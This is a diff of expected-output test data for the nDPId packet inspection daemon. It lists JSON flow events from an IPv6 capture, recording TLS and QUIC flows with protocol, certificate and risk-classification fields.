+00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
+01385{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":628,"midstream":0,"ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}}
+00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3080,"flow_avg_l4_payload_len":513,"midstream":0,"ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
+01385{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":471,"midstream":0,"ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}}
+00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1448269146905,"flow_last_seen":1448269146970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":344,"midstream":0,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1448269146905,"flow_last_seen":1448269146966,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":413,"midstream":0,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1448269127395,"flow_last_seen":1448269127510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":506,"flow_tot_l4_payload_len":1009,"flow_avg_l4_payload_len":72,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00610{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1448269127395,"flow_last_seen":1448269127510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":506,"flow_tot_l4_payload_len":1009,"flow_avg_l4_payload_len":72,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1448269127400,"flow_last_seen":1448269138520,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":12133,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
-00620{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269139314,"flow_last_seen":1448269139321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1448269127400,"flow_last_seen":1448269138520,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":12133,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269139314,"flow_last_seen":1448269139321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269139314,"flow_last_seen":1448269139321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00623{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269127922,"flow_last_seen":1448269127940,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269127922,"flow_last_seen":1448269127940,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00603{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269127922,"flow_last_seen":1448269127940,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00726{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":0,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10":"TLS Certificate Mismatch"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
-00726{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":315,"midstream":0,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10":"TLS Certificate Mismatch"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
-00726{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1448269139219,"flow_last_seen":1448269139339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":298,"midstream":0,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10":"TLS Certificate Mismatch"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
-00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1448269144450,"flow_last_seen":1448269144884,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":13365,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10":"TLS Certificate Mismatch"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
-00623{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269123954,"flow_last_seen":1448269123971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":0,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":315,"midstream":0,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1448269139219,"flow_last_seen":1448269139339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":298,"midstream":0,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
+00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1448269144450,"flow_last_seen":1448269144884,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":13365,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
+00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269123954,"flow_last_seen":1448269123971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00603{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269123954,"flow_last_seen":1448269123971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269143410,"flow_last_seen":1448269143539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00671{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269143410,"flow_last_seen":1448269143539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00615{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269143410,"flow_last_seen":1448269143539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00622{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1448269127960,"flow_last_seen":1448269128028,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::5f","src_port":55145,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1448269127960,"flow_last_seen":1448269128028,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::5f","src_port":55145,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00622{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269144306,"flow_last_seen":1448269144348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269144306,"flow_last_seen":1448269144348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00602{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269144306,"flow_last_seen":1448269144348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00624{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269145458,"flow_last_seen":1448269145478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
